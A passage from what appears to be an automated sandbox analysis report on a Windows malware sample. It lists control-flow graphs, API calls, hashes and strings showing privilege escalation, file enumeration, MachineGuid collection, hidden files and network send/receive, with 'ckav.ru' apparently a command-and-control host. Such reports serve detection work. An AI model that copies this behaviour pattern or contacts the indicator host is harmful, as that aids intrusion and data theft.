9695->9697 9698 404cbf 8 API calls 9697->9698 9699 40f0fb 9698->9699 9700 413aca 4 API calls 9699->9700 9701 40f10a 9700->9701 9702 405695 2 API calls 9701->9702 9702->9693

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNext
                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                              • API String ID: 1690352074-2009209621
                                              • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                              • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 3615134276-2896544425
                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                              APIs
                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                              • _wmemset.LIBCMT ref: 00406244
                                              • _wmemset.LIBCMT ref: 00406261
                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wmemset$ErrorInformationLastToken
                                              • String ID: IDA$IDA
                                              • API String ID: 487585393-2020647798
                                              • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                              • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: freeaddrinfogetaddrinfosocket
                                              • String ID:
                                              • API String ID: 2479546573-0
                                              • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                              • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AllocCreateReadVirtual
                                              • String ID: .tmp
                                              • API String ID: 3585551309-2986845003
                                              • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                              • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                              • GetLastError.KERNEL32 ref: 0041399E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Error$CreateLastModeMutex
                                              • String ID:
                                              • API String ID: 3448925889-0
                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 3672724799-0
                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                              • String ID: ckav.ru
                                              • API String ID: 2915393847-2696028687
                                              • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                              • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • _wmemset.LIBCMT ref: 0040634F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess_wmemset
                                              • String ID: CA
                                              • API String ID: 2773065342-1052703068
                                              • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                              • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                              APIs
                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InformationToken
                                              • String ID: IDA
                                              • API String ID: 4114910276-365204570
                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                              APIs
                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: s1@
                                              • API String ID: 190572456-427247929
                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 1425999871-0
                                              • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                              • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                              APIs
                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CheckMembershipToken
                                              • String ID:
                                              • API String ID: 1351025785-0
                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                              APIs
                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                              APIs
                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                              APIs
                                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                              APIs
                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                              APIs
